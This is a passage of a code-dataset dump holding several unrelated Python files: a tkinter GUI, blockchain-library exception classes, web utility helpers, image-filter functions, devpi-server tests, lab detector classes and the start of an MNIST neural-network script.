live_run_test()","sub_path":"jy_case/livetest.py","file_name":"livetest.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"651813067","text":"import tkinter as tk\nimport numpy as np\nfrom views.Main import Main\nfrom views.Settings import Settings\n\nfrom packages.Controller import Controller\n\n\n\nclass MainView(tk.Frame):\n\n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n\n self.configDict = {}\n root = args[0]\n controller = Controller(root)\n self.controller = controller\n\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n controller.container = container\n controller.startPage = Main(self)\n controller.settingsPage = Settings(self)\n\n controller.startPage.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n controller.settingsPage.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n\n controller.initPagesButtons()\n controller.startPage.show()\n\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n root.title('Vidan')\n root.iconbitmap('vidan2.ico')\n main = MainView(root)\n main.pack(side=\"top\", fill=\"both\", expand=True)\n root.wm_geometry(\"400x400\")\n root.mainloop()\n","sub_path":"VidAn/VidAn.py","file_name":"VidAn.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"489275250","text":"from . import libevt\n\n\nclass EVTErrCode:\n EVT_OK = 0\n EVT_INTERNAL_ERROR = -1\n EVT_INVALID_ARGUMENT = -2\n EVT_INVALID_PRIVATE_KEY = -3\n EVT_INVALID_PUBLIC_KEY = -4\n EVT_INVALID_SIGNATURE = -5\n EVT_INVALID_HASH = -6\n EVT_INVALID_ACTION = -7\n EVT_INVALID_BINARY = -8\n EVT_INVALID_JSON = -9\n EVT_INVALID_ADDRESS = -10\n EVT_SIZE_NOT_EQUALS = -11\n EVT_DATA_NOT_EQUALS = -12\n EVT_INVALID_LINK = -13\n EVT_NOT_INIT = -15\n\n\nclass EVTException(Exception):\n def __init__(self, err):\n if err == 'EVT_INTERNAL_ERROR':\n evt = libevt.check_lib_init()\n code = evt.evt_last_error()\n\n errmsg = '{}: {}'.format(err, code)\n super().__init__(self, errmsg)\n else:\n super().__init__(self, err)\n\n\nclass EVTInternalErrorException(Exception):\n def __init__(self):\n err = 'EVT_INTERNAL_ERROR'\n super().__init__(self, err)\n\n\nclass EVTInvalidArgumentException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_ARGUMENT'\n super().__init__(self, err)\n\n\nclass EVTInvalidPrivateKeyException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_PRIVATE_KEY'\n super().__init__(self, err)\n\n\nclass EVTInvalidPublicKeyException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_PUBLIC_KEY'\n super().__init__(self, err)\n\n\nclass EVTInvalidSignatureException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_SIGNATURE'\n super().__init__(self, err)\n\n\nclass EVTInvalidHashException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_HASH'\n super().__init__(self, err)\n\n\nclass EVTInvalidActionException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_ACTION'\n super().__init__(self, err)\n\n\nclass EVTInvalidBinaryException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_BINARY'\n super().__init__(self, err)\n\n\nclass EVTInvalidJsonException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_JSON'\n super().__init__(self, err)\n\n\nclass EVTInvalidAddressException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_ADDRESS'\n super().__init__(self, err)\n\n\nclass EVTSizeNotEqualsException(Exception):\n def __init__(self):\n err = 'EVT_SIZE_NOT_EQUALS'\n super().__init__(self, err)\n\n\nclass EVTDataNotEqualsException(Exception):\n def __init__(self):\n err = 'EVT_DATA_NOT_EQUALS'\n super().__init__(self, err)\n\n\nclass EVTInvalidLinkException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_LINK'\n super().__init__(self, err)\n\n\nclass EVTNotInitException(Exception):\n def __init__(self):\n err = 'EVT_NOT_INIT'\n super().__init__(self, err)\n\n\nex_map = {\n EVTErrCode.EVT_INTERNAL_ERROR: EVTInternalErrorException,\n EVTErrCode.EVT_INVALID_ARGUMENT: EVTInvalidArgumentException,\n EVTErrCode.EVT_INVALID_PRIVATE_KEY: EVTInvalidPrivateKeyException,\n EVTErrCode.EVT_INVALID_PUBLIC_KEY: EVTInvalidPublicKeyException,\n EVTErrCode.EVT_INVALID_SIGNATURE: EVTInvalidSignatureException,\n EVTErrCode.EVT_INVALID_HASH: EVTInvalidHashException,\n EVTErrCode.EVT_INVALID_ACTION: EVTInvalidActionException,\n EVTErrCode.EVT_INVALID_BINARY: EVTInvalidBinaryException,\n EVTErrCode.EVT_INVALID_JSON: EVTInvalidJsonException,\n EVTErrCode.EVT_INVALID_ADDRESS: EVTInvalidAddressException,\n EVTErrCode.EVT_INVALID_LINK: EVTInvalidLinkException,\n EVTErrCode.EVT_SIZE_NOT_EQUALS: EVTSizeNotEqualsException,\n EVTErrCode.EVT_DATA_NOT_EQUALS: EVTDataNotEqualsException,\n EVTErrCode.EVT_NOT_INIT: EVTNotInitException\n}\n\n\ndef evt_exception_raiser(error_code):\n if error_code == EVTErrCode.EVT_OK:\n return\n if error_code in ex_map:\n raise ex_map[error_code]\n raise Exception('Unknown error code')\n","sub_path":"bind/pyevt/pyevt/evt_exception.py","file_name":"evt_exception.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"590277245","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Mardix/Dropbox/Projects/Python/Flasik/flasik/utils.py\n# Compiled at: 2019-09-07 12:28:17\n\"\"\"\nutils.py\n\nThis module contains some common functions, and also exposes under the `utils`\nnamespace some 3rd party functions. ie: \n utils.slugify \n utils.dasherize\n \nothers:\n utils.is_email_valid\n utils.md5(string)\n\n\"\"\"\nfrom __future__ import division\nimport os, re, inspect, time, datetime, arrow, string, random, socket, itsdangerous, humanize, pkg_resources, urllib, hashlib, json, uuid\nfrom six import string_types\nfrom slugify import slugify\nfrom werkzeug.utils import import_string\nfrom distutils.dir_util import copy_tree as copy_dir, remove_tree as remove_dir, mkpath as make_dirs\nfrom distutils.file_util import copy_file, move_file\nfrom inflection import dasherize, underscore, camelize, pluralize, singularize, titleize\nfrom six.moves.urllib.parse import urlparse, urlencode, unquote_plus as urllib_unquote_plus\n__all__ = [\n 'is_email_valid',\n 'is_password_valid',\n 'is_username_valid',\n 'is_url_valid',\n 'urldecode',\n 'urlencode',\n 'md5',\n 'guid',\n 'slugify',\n 'chunk_list',\n 'in_any_list',\n 'dict_dot',\n 'list_replace',\n 'dict_replace',\n 'to_json',\n 'dasherize',\n 'undescore',\n 'camelize',\n 'plurialize',\n 'singularize',\n 'titleize']\n\ndef is_email_valid(email):\n \"\"\"\n Check if email is valid\n \"\"\"\n pattern = re.compile('[\\\\w\\\\.-]+@[\\\\w\\\\.-]+[.]\\\\w+')\n return bool(pattern.match(email))\n\n\ndef is_password_valid(password):\n \"\"\"\n Check if a password is valid\n \"\"\"\n pattern = re.compile('^.{4,75}$')\n return bool(pattern.match(password))\n\n\ndef is_username_valid(username):\n \"\"\"\n Check if a valid username.\n valid:\n oracle\n bill-gates\n steve.jobs\n micro_soft\n not valid\n Bill Gates - no space allowed\n me@yo.com - @ is not a valid character\n :param username: string\n :return:\n \"\"\"\n pattern = re.compile('^[a-zA-Z0-9_.-]+$')\n return bool(pattern.match(username))\n\n\ndef is_url_valid(url):\n \"\"\"\n Check if url is valid\n \"\"\"\n pattern = re.compile('^(?:http|ftp)s?://(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\\\.)+(?:[A-Z]{2,6}\\\\.?|[A-Z0-9-]{2,}\\\\.?)|\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})(?::\\\\d+)?(?:/?|[/?]\\\\S+)$', re.IGNORECASE)\n return bool(pattern.match(url))\n\n\ndef urldecode(s):\n return urllib_unquote_plus(s)\n\n\ndef md5(value):\n \"\"\"\n Create MD5\n :param value:\n :return:\n \"\"\"\n m = hashlib.md5()\n m.update(value)\n return str(m.hexdigest())\n\n\ndef guid():\n \"\"\"\n Creates and returns a UUID 4 hex value\n :return: string\n \"\"\"\n return uuid.uuid4().hex\n\n\ndef chunk_list(items, size):\n \"\"\"\n Return a list of chunks\n :param items: List\n :param size: int The number of items per chunk\n :return: List\n \"\"\"\n size = max(1, size)\n return [ items[i:i + size] for i in range(0, len(items), size) ]\n\n\ndef in_any_list(items1, items2):\n \"\"\"\n Check if any items are in list2\n :param items1: list\n :param items2: list\n :return:\n \"\"\"\n return any(i in items2 for i in items1)\n\n\ndef generate_random_string(length=8):\n \"\"\"\n Generate a random string\n \"\"\"\n char_set = string.ascii_uppercase + string.digits\n return ('').join(random.sample(char_set * (length - 1), length))\n\n\ndef generate_random_hash(size=32):\n \"\"\"\n Return a random hash key\n :param size: The max size of the hash\n :return: string\n \"\"\"\n return os.urandom(size // 2).encode('hex')\n\n\nclass dict_dot(dict):\n \"\"\"\n A dict extension that allows dot notation to access the data.\n ie: dict.get('key.key2.0.keyx')\n my_dict = {...}\n d = dict_dot(my_dict)\n d.get(\"key1\")\n d.get(\"key1.key2\")\n d.get(\"key3.key4.0.keyX\")\n\n Still have the ability to access it as a normal dict\n d[key1][key2]\n \"\"\"\n\n def get(self, key, default=None):\n \"\"\"\n Access data via\n :param key:\n :param default: the default value\n :return:\n \"\"\"\n try:\n val = self\n if '.' not in key:\n return self[key]\n for k in key.split('.'):\n if k.isdigit():\n k = int(k)\n val = val[k]\n\n return val\n except (TypeError, KeyError, IndexError) as e:\n return default\n\n\ndef list_replace(subject_list, replacement, string):\n \"\"\"\n To replace a list of items by a single replacement\n :param subject_list: list\n :param replacement: string\n :param string: string\n :return: string\n \"\"\"\n for s in subject_list:\n string = string.replace(s, replacement)\n\n return string\n\n\ndef dict_replace(subject_dict, string):\n \"\"\"\n Replace a dict map, key to its value in the stirng\n :param subject_dict: dict\n :param string: string\n :return: string\n \"\"\"\n for i, j in subject_dict.items():\n string = string.replace(i, j)\n\n return string\n\n\ndef to_json(d):\n \"\"\"\n Convert data to json. It formats datetime/arrow time\n :param d: dict or list\n :return: json data\n \"\"\"\n return json.dumps(d, cls=_FlasikJSONEncoder)\n\n\nclass _FlasikJSONEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, arrow.Arrow):\n return obj.for_json()\n if isinstance(obj, datetime.datetime):\n return obj.strftime('%Y-%m-%dT%H:%M:%SZ')\n if isinstance(obj, datetime.date):\n return obj.strftime('%Y-%m-%d')\n return json.JSONEncoder.default(self, obj)\n\n\nclass InspectDecoratorCompatibilityError(Exception):\n pass\n\n\nclass _InspectMethodsDecorators(object):\n \"\"\"\n This class attempt to retrieve all the decorators in a method\n \"\"\"\n\n def __init__(self, method):\n self.method = method\n self.decos = []\n\n def parse(self):\n \"\"\"\n Return the list of string of all the decorators found\n \"\"\"\n self._parse(self.method)\n return list(set([ deco for deco in self.decos if deco ]))\n\n @classmethod\n def extract_deco(cls, line):\n line = line.strip()\n if line.startswith('@'):\n if '(' in line:\n line = line.split('(')[0].strip()\n return line.strip('@')\n\n def _parse(self, method):\n argspec = inspect.getargspec(method)\n args = argspec[0]\n if args and args[0] == 'self':\n return argspec\n else:\n if hasattr(method, '__func__'):\n method = method.__func__\n if not hasattr(method, '__closure__') or method.__closure__ is None:\n raise InspectDecoratorCompatibilityError\n closure = method.__closure__\n for cell in closure:\n inner_method = cell.cell_contents\n if inner_method is method:\n continue\n if not inspect.isfunction(inner_method) and not inspect.ismethod(inner_method):\n continue\n src = inspect.getsourcelines(inner_method)[0]\n self.decos += [ self.extract_deco(line) for line in src ]\n self._parse(inner_method)\n\n return\n\n\ndef get_decorators_list(method):\n \"\"\"\n Shortcut to InspectMethodsDecorators\n :param method: object\n :return: List\n \"\"\"\n kls = _InspectMethodsDecorators(method)\n return kls.parse()","sub_path":"pycfiles/Assembly-1.3.0-py2-none-any/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"534622303","text":"class Solution(object):\n def checkSubarraySum(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: bool\n \"\"\"\n\n if len(nums) < 2: return False\n if sum(nums) == 0: return True\n if k == 0: return False\n if k < 0: k = -k\n mp, s = {}, 0\n for i, n in enumerate(nums):\n s += n\n if not s % k and i > 0:\n return True\n if s % k in mp:\n if i - mp[s % k] > 0:\n return True\n else:\n mp[s % k] = i\n return False\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.checkSubarraySum([1, 1], 2))\n pass","sub_path":"continousSubarraySumKMultiple.py","file_name":"continousSubarraySumKMultiple.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"334988111","text":"def blend(pic1, pic2):\n\n # Assumes the pictures are the same size\n\n width, height = getWidth(pic1), getHeight(pic1)\n\n blendedPic = makeEmptyPicture(width, height)\n\n for x in xrange(width):\n for y in xrange(height):\n \n targetPixel = getPixel(blendedPic, x, y)\n\n p1 = getPixel(pic1, x, y)\n p2 = getPixel(pic2, x, y)\n\n r1, g1, b1 = getRed(p1), getGreen(p1), getBlue(p1)\n r2, g2, b2 = getRed(p2), getGreen(p2), getBlue(p2)\n\n blendedColor = makeColor( (r1+r2)/2 , (g1+g2)/2, (b1+b2)/2 )\n\n setColor(targetPixel, blendedColor)\n\n return blendedPic\n\n#Steps to take in command\\/\n#p1 = makePicture(pickAFile()) *this line choses the dome\n#p2 = makePicture(pickAFile()) *this line choses the surface\n#blendedPic = blend(p1, p2) *this executes the algorithm to the desired pictures, in this case P1(the dome) ontop P2(the surface)\n#show(blendedPic) *this finally shows the effect on screen\n\ndef BW(pic):\n picture = duplicatePicture(pic)\n for px in getPixels(picture):\n \n luminance = ( getRed(px) + getBlue(px) + getGreen(px) )/3\n if luminance < 50:\n setColor(px, makeColor(50, 50, 50))\n elif luminance < 100:\n setColor(px, makeColor(100, 100, 100))\n elif luminance < 150:\n setColor(px, makeColor(150, 150, 150))\n elif luminance < 200:\n setColor(px, makeColor(200, 200, 200))\n else:\n setColor(px, white)\n return picture\n# This effect essentially tones down All RGB (red, green & blue) values of the image leaving it a simple black and white frame.\n# STEPS TO TAKE: \\/\n# pic = makePicture(pickAFile())\n# BWpic = BW(pic)\n# show(BWpic)\n\ndef edge(pic, precision = 4): #the value at the end of this line determines the strength of effect (4 is recommended)\n \n picture = duplicatePicture(pic)\n width, height = getWidth(pic) , getHeight(pic)\n \n for y in xrange(height - 1):\n for x in xrange(width - 1):\n \n px = getPixel(picture, x, y) # original pixel\n right = getPixel(picture, x + 1, y)\n below = getPixel(picture, x, y + 1)\n \n luminance = lambda px: (getRed(px) + getBlue(px) + getGreen(px) )/3\n \n LR = luminance(right)\n LB = luminance(below)\n LO = luminance(px)\n \n if abs(LR - LO) > precision and abs(LB - LO) > precision:\n setColor(px, black)\n else:\n setColor(px, white)\n \n return picture\n\n# picture = makePicture(pickAFile())\n# edgeSpace = edge(picture)\n# show(edgeSpace)\n\ndef negative(picture):\n\n copy = duplicatePicture(picture)\n\n for px in getPixels(copy):\n \n R = getRed(px)\n G = getGreen(px)\n B = getBlue(px)\n \n negativeColor = makeColor(255 - R, 255-G, 255-B)\n setColor(px, negativeColor)\n \n return copy\n\n\n# This is the program that would run all effects with one input.\n# The images I used were the same size of 600px, 600px\n# Images included with source code\n# P1 is Dome\n# P2 is Pillars of creation\n\ndef main():\n p1 = makePicture(pickAFile())\n p2 = makePicture(pickAFile())\n blendedPic = blend(p1, p2)\n show(blendedPic) \n BWpic = BW(blendedPic)\n show(BWpic)\n edgeSpace = edge(BWpic)\n show(edgeSpace)\n negativePic = negative(edgeSpace)\n show(negativePic)","sub_path":"All effects.py","file_name":"All effects.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"517890694","text":"from enum import Enum, unique\n\n\n@unique\nclass Status(Enum):\n Init, Waiting, Running, Cancelled, Errored, Finished = range(6)\n\n def label(self):\n if self.name == 'Cancelled': return 'label-warning'\n if self.name == 'Errored': return 'label-danger'\n if self.name == 'Finished': return 'label-success'\n return 'label-info'\n","sub_path":"Executor/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"111574625","text":"import sys\nimport os\nimport py\nimport pytest\nfrom .conftest import get_open_port\nfrom devpi_server.main import main\nfrom devpi_server.bgserver import no_proxy\n\n\n@pytest.mark.skipif(\"not config.option.slow\")\ndef test_server_commands(tmpdir, monkeypatch):\n monkeypatch.setenv(\"DEVPISERVER_SERVERDIR\", tmpdir.strpath)\n monkeypatch.setattr(sys, \"argv\",\n [str(py.path.local.sysfind(\"devpi-server\"))])\n if sys.platform == \"win32\":\n # Windows strips the \"exe\" from the first argument of sys.argv\n # The first entry in sys.path contains the executable path\n monkeypatch.setattr(sys, \"path\",\n [sys.argv[0]] + sys.path)\n monkeypatch.setattr(sys, \"argv\",\n [sys.argv[0][:-4]])\n\n port = get_open_port('localhost')\n portopt = \"--port=\" + str(port)\n main([\"devpi-server\", \"--init\", \"--start\", portopt])\n try:\n main([\"devpi-server\", \"--status\"])\n main([\"devpi-server\", \"--log\"])\n # make sure we can't start a server if one is already running\n with pytest.raises(SystemExit):\n main([\"devpi-server\", \"--start\", portopt])\n finally:\n main([\"devpi-server\", \"--stop\"])\n\n\ndef test_no_proxy(monkeypatch):\n envvars = [\"no_proxy\", \"NO_PROXY\"]\n for var in envvars:\n monkeypatch.setenv(var, \"123\")\n\n with no_proxy(\"localhost:8080\"):\n assert os.environ[\"no_proxy\"] == \"localhost:8080\"\n # on windows env variable names are case-insensitive\n if not sys.platform.startswith(\"win32\"):\n assert \"NO_PROXY\" not in os.environ\n\n for var in envvars:\n assert os.environ[var] == \"123\"\n","sub_path":"server/test_devpi_server/test_bgserver.py","file_name":"test_bgserver.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96650988","text":"#! /usr/bin/env nix-shell\n#! nix-shell -i python -p python python2Packages.lxml\n\nimport lxml.etree as et\n\n#fname='780b91b0ef99cf032d5e73b2fa21c7f76f94fb98bc0a31d20bbdb9413c3f1c03-primary.xml'\nfname='48986ce4583cd09825c6d437150314446f0f49fa1a1bd62dcfa1085295030fe9-primary.xml'\nwith open(fname) as f:\n tree=et.fromstring(f.read())\n\nnames = set(tree.xpath(\"//*[name()='package']/*[name()='name']/text()\"))\nprefix_len = lambda prefix,names : len(filter(lambda x:x.startswith(prefix),names))\n\nprint (\"total=%s\" % len(names))\nprint (\"py2=%s\" % prefix_len('python2-',names))\nprint (\"py=%s\" % prefix_len('python-',names))\nprint (\"py3=%s\" % prefix_len('python3-',names))\n","sub_path":"fedora-pkgs/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"62877134","text":"#!/usr/bin/env python\n#pylint: skip-file\n\"\"\"\nCopyright 2016 Cisco Systems\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nclass Constructor(object):\n\n\n\n def __init__(self):\n \"\"\"\n Attributes:\n swaggerTypes (dict): The key is attribute name and the value is attribute type.\n attributeMap (dict): The key is attribute name and the value is json key in definition.\n \"\"\"\n self.swaggerTypes = {\n\n 'modifiers': 'int',\n\n\n 'name': 'str',\n\n\n 'synthetic': 'bool',\n\n\n 'typeParameters': 'list[TypeVariable]',\n\n\n 'declaringClass': 'Class«object»',\n\n\n 'declaredAnnotations': 'list[Annotation]',\n\n\n 'parameterTypes': 'list[Class]',\n\n\n 'genericParameterTypes': 'list[Type]',\n\n\n 'exceptionTypes': 'list[Class]',\n\n\n 'genericExceptionTypes': 'list[Type]',\n\n\n 'varArgs': 'bool',\n\n\n 'parameterAnnotations': 'list[Array]',\n\n\n 'annotations': 'list[Annotation]',\n\n\n 'accessible': 'bool'\n\n }\n\n self.attributeMap = {\n\n 'modifiers': 'modifiers',\n\n 'name': 'name',\n\n 'synthetic': 'synthetic',\n\n 'typeParameters': 'typeParameters',\n\n 'declaringClass': 'declaringClass',\n\n 'declaredAnnotations': 'declaredAnnotations',\n\n 'parameterTypes': 'parameterTypes',\n\n 'genericParameterTypes': 'genericParameterTypes',\n\n 'exceptionTypes': 'exceptionTypes',\n\n 'genericExceptionTypes': 'genericExceptionTypes',\n\n 'varArgs': 'varArgs',\n\n 'parameterAnnotations': 'parameterAnnotations',\n\n 'annotations': 'annotations',\n\n 'accessible': 'accessible'\n\n }\n\n\n\n self.modifiers = None # int\n\n\n self.name = None # str\n\n\n self.synthetic = None # bool\n\n\n self.typeParameters = None # list[TypeVariable]\n\n\n self.declaringClass = None # Class«object»\n\n\n self.declaredAnnotations = None # list[Annotation]\n\n\n self.parameterTypes = None # list[Class]\n\n\n self.genericParameterTypes = None # list[Type]\n\n\n self.exceptionTypes = None # list[Class]\n\n\n self.genericExceptionTypes = None # list[Type]\n\n\n self.varArgs = None # bool\n\n\n self.parameterAnnotations = None # list[Array]\n\n\n self.annotations = None # list[Annotation]\n\n\n self.accessible = None # bool\n\n","sub_path":"apis/nb/clients/inventory_manager_client/models/Constructor.py","file_name":"Constructor.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154961308","text":"\"\"\"\nBase detector functions, i.e. Detector_Function and its first order descendents\nextracted from pycqed/measurement/detector_functions.py commit 0da380ad2adf2dc998f5effef362cdf264b87948\n\"\"\"\n\nimport numpy as np\n\n\nclass Detector_Function(object):\n\n '''\n Detector_Function class for MeasurementControl\n '''\n\n def __init__(self, **kw):\n self.name = self.__class__.__name__\n self.detector_control = ''\n self.set_kw()\n self.value_names = ['val A', 'val B']\n self.value_units = ['arb. units', 'arb. units']\n\n self.prepare_function = None\n self.prepare_function_kwargs = None\n\n def set_kw(self, **kw):\n '''\n convert keywords to attributes\n '''\n for key in list(kw.keys()):\n exec('self.%s = %s' % (key, kw[key]))\n\n def arm(self):\n \"\"\"\n Ensures acquisition instrument is ready to measure on first trigger.\n \"\"\"\n pass\n\n # FIXME: seems to be overridden by every class except None_Detector, so probably misplaced\n def prepare(self, **kw):\n if self.prepare_function_kwargs is not None:\n if self.prepare_function is not None:\n self.prepare_function(**self.prepare_function_kwargs)\n else:\n if self.prepare_function is not None:\n self.prepare_function()\n\n def set_prepare_function(self,\n prepare_function,\n prepare_function_kwargs: dict = dict()):\n \"\"\"\n Set an optional custom prepare function.\n\n prepare_function: function to call during prepare\n prepare_function_kwargs: keyword arguments to be passed to the\n prepare_function.\n\n N.B. Note that not all detectors support a prepare function and\n the corresponding keywords.\n Detectors that do not support this typicaly ignore these attributes.\n \"\"\"\n self.prepare_function = prepare_function\n self.prepare_function_kwargs = prepare_function_kwargs\n\n def get_values(self): # FIXME: only for Hard_Detector?\n pass\n\n def finish(self, **kw):\n pass\n\n\nclass Mock_Detector(Detector_Function):\n def __init__(\n self,\n value_names=['val'],\n value_units=['arb. units'],\n detector_control='soft',\n mock_values=np.zeros([20, 1]),\n **kw\n ):\n self.name = self.__class__.__name__\n self.set_kw()\n self.value_names = value_names\n self.value_units = value_units\n self.detector_control = detector_control\n self.mock_values = mock_values\n self._iteration = 0\n\n def acquire_data_point(self, **kw):\n '''\n Returns something random for testing\n '''\n idx = self._iteration % (np.shape(self.mock_values)[0])\n self._iteration += 1\n return self.mock_values[idx]\n\n def get_values(self):\n return self.mock_values\n\n def prepare(self, **kw):\n pass\n\n def finish(self, **kw):\n pass\n\n\nclass Multi_Detector(Detector_Function):\n \"\"\"\n Combines several detectors of the same type (hard/soft) into a single\n detector.\n \"\"\"\n\n def __init__(\n self,\n detectors: list,\n detector_labels: list = None,\n det_idx_prefix: bool = True,\n **kw\n ):\n \"\"\"\n detectors (list):\n a list of detectors to combine.\n det_idx_prefix(bool):\n if True prefixes the value names with\n detector_labels (list):\n if not None, will be used instead instead of\n \"det{idx}_\" as a prefix for the different channels\n \"\"\"\n self.detectors = detectors\n self.name = 'Multi_detector'\n self.value_names = []\n self.value_units = []\n for i, detector in enumerate(detectors):\n for detector_value_name in detector.value_names:\n if det_idx_prefix:\n if detector_labels is None:\n val_name = 'det{} '.format(i) + detector_value_name\n else:\n val_name = detector_labels[i] + \\\n ' ' + detector_value_name\n else:\n val_name = detector_value_name\n self.value_names.append(val_name)\n for detector_value_unit in detector.value_units:\n self.value_units.append(detector_value_unit)\n\n self.detector_control = self.detectors[0].detector_control\n for d in self.detectors:\n if d.detector_control != self.detector_control:\n raise ValueError('All detectors should be of the same type')\n\n def prepare(self, **kw):\n for detector in self.detectors:\n detector.prepare(**kw)\n\n def set_prepare_function(\n self,\n prepare_function,\n prepare_function_kw: dict = dict(),\n detectors: str = 'all'\n ):\n \"\"\"\n Set an optional custom prepare function.\n\n prepare_function: function to call during prepare\n prepare_function_kw: keyword arguments to be passed to the\n prepare_function.\n detectors : |\"all\"|\"first\"|\"last\"|\n sets the prepare function to \"all\" child detectors, or only\n on the \"first\" or \"last\"\n\n The multi detector passes the arguments to the set_prepare_function\n method of all detectors it contains.\n \"\"\"\n if detectors == \"all\":\n for detector in self.detectors:\n detector.set_prepare_function(\n prepare_function, prepare_function_kw)\n elif detectors == 'first':\n self.detectors[0].set_prepare_function(\n prepare_function, prepare_function_kw)\n elif detectors == 'last':\n self.detectors[-1].set_prepare_function(\n prepare_function, prepare_function_kw)\n\n def set_child_attr(self, attr, value, detectors: str = 'all'):\n \"\"\"\n Set an attribute of child detectors.\n\n attr (str): the attribute to set\n value : the value to set the attribute to\n\n detectors : |\"all\"|\"first\"|\"last\"|\n sets the attribute on \"all\" child detectors, or only\n on the \"first\" or \"last\"\n \"\"\"\n if detectors == \"all\":\n for detector in self.detectors:\n setattr(detector, attr, value)\n elif detectors == 'first':\n setattr(self.detectors[0], attr, value)\n elif detectors == 'last':\n setattr(self.detectors[-1], attr, value)\n\n def get_values(self):\n values_list = []\n for detector in self.detectors:\n detector.arm()\n for detector in self.detectors:\n new_values = detector.get_values()\n values_list.append(new_values)\n values = np.concatenate(values_list)\n return values\n\n def acquire_data_point(self):\n # N.B. get_values and acquire_data point are virtually identical.\n # the only reason for their existence is a historical distinction\n # between hard and soft detectors that leads to some confusing data\n # shape related problems, hence the append vs concatenate\n values = []\n for detector in self.detectors:\n new_values = detector.acquire_data_point()\n values = np.append(values, new_values)\n return values\n\n def finish(self):\n for detector in self.detectors:\n detector.finish()\n\n\nclass None_Detector(Detector_Function):\n\n def __init__(self, **kw):\n super(None_Detector, self).__init__()\n self.detector_control = 'soft'\n self.set_kw()\n self.name = 'None_Detector'\n self.value_names = ['None']\n self.value_units = ['None']\n\n def acquire_data_point(self, **kw):\n '''\n Returns something random for testing\n '''\n return np.random.random()\n\n\nclass Soft_Detector(Detector_Function):\n\n def __init__(self, **kw):\n super().__init__(**kw)\n self.detector_control = 'soft'\n\n def prepare(self, sweep_points=None):\n pass\n\n def acquire_data_point(self, **kw):\n return np.random.random()\n\n\nclass Hard_Detector(Detector_Function):\n\n def __init__(self, **kw):\n super().__init__()\n self.detector_control = 'hard'\n\n def prepare(self, sweep_points=None):\n pass\n","sub_path":"pycqed/measurement/det_fncs/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"123558575","text":"# -*- coding: utf-8 -*-\n\nimport pickle\nimport datetime as dt\nimport sys\nfrom mnist_loader import training_x, training_d as training_y, test_x, test_d as test_y\nfrom utils import *\n\n# Setting\noutput_path = ''\nif len(sys.argv) == 2 and sys.argv[1] == 'y':\n output_path = '/output/'\n\ntraining_x = np.array(training_x)\ntest_x = np.array(test_x)\n\ntraining_x /= 255.0\ntest_x /= 255.0\ntraining_y, _ = one_to_hot(training_y.A1)\ntest_y, _ = one_to_hot(test_y.A1)\nlabels = list(range(10))\n\nn_epoch = 30\nbatch_size = 100\nnn_list = dict()\n\n# 1. No hidden layer\nlayers = list()\nlayers.append(Input(28*28))\n\nlayers.append(FullyConnected(28*28, 10))\nlayers.append(Softmax())\n\nnn_list['NO_HIDDEN_LAYER'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(1.0)}\n\n\n# 2. 1-hidden layer\nlayers = list()\nlayers.append(Input(28*28))\n\nlayers.append(FullyConnected(28*28, 